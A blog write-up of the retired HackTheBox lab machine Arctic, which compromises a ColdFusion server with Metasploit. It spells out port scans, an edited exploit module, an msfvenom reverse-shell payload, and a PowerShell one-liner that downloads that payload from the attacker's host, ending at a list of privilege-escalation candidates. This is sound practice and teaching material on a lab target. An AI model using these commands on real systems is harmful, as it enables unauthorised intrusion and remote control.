Posted on May 23, 2020 • Originally published at blog.artis3nal.com on May 23, 2020

Writeup: HackTheBox Arctic - with Metasploit

This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.

Arctic

Difficulty: Easy

Machine IP: 10.10.10.11

I run a quick port scan to identify the open ports:

nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 22:21 EDT Nmap scan report for 10.10.10.11 Host is up (0.018s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 135/tcp open msrpc 8500/tcp open fmtp 49154/tcp open unknown

I then interrogate the three open ports:

nmap -A -sC -sV -Pn -p135,8500,49154 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 22:23 EDT Nmap scan report for 10.10.10.11 Host is up (0.013s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

THe 8500 port defies identification. Navigating to it in my browser, I see it is a web server.

I bust out gobuster. It times out trying to query the server. By manually navigating to a few test paths and counting seconds, I see the issue. The server waits 25 seconds before responding to any web request.

I extend gobuster's HTTP timeout to 35 seconds with the flag --timeout 35.

It takes a while for the brute force to run, but I eventually make my way to this page:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm

Where I find a Coldfusion web server.

Searching for vulnerabilities on exploit-db with searchsploit coldfusion, I find the following:

Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt

Ah, and it has a matching Metasploit module: exploit/windows/http/coldfusion_fckeditor.

This module will not work out of the box, however, as its default timeout is 5 seconds.

The module file is located at /usr/share/metasploit-framework/modules/exploits/windows/http/coldfusion_fckeditor.rb.

You want to find the send_request_cgi and send_request_raw methods and change the 5 at the end of their function declarations to 30, to increase their timeouts from 5 seconds to 30 seconds.

From there, you can execute this exploit to obtain a user shell and the accompanying user flag.

Let's take this user shell and upgrade it to a Meterpreter shell so that we can run Metasploit's local privilege suggester for privilege escalation options.

We create a payload with msfvenom and start a local web server:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.29 lport=4645 -f exe > shell.exe sudo python3 -m http.server

Then, in our user shell on the target, we can execute this powershell one-liner to download the file:

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.29:8000/shell.exe', 'fun.exe')"

From there we start a Meterpreter handler on port 4645 and run the fun.exe executable on the target. Our meterpreter user shell connects.

Now run run post/multi/recon/local_exploit_suggester:

msf5 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.11 - Collecting local exploits for x64/windows... [*] 10.10.10.11 - 15 exploit checks are being tried... [+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [*] Post module execution completed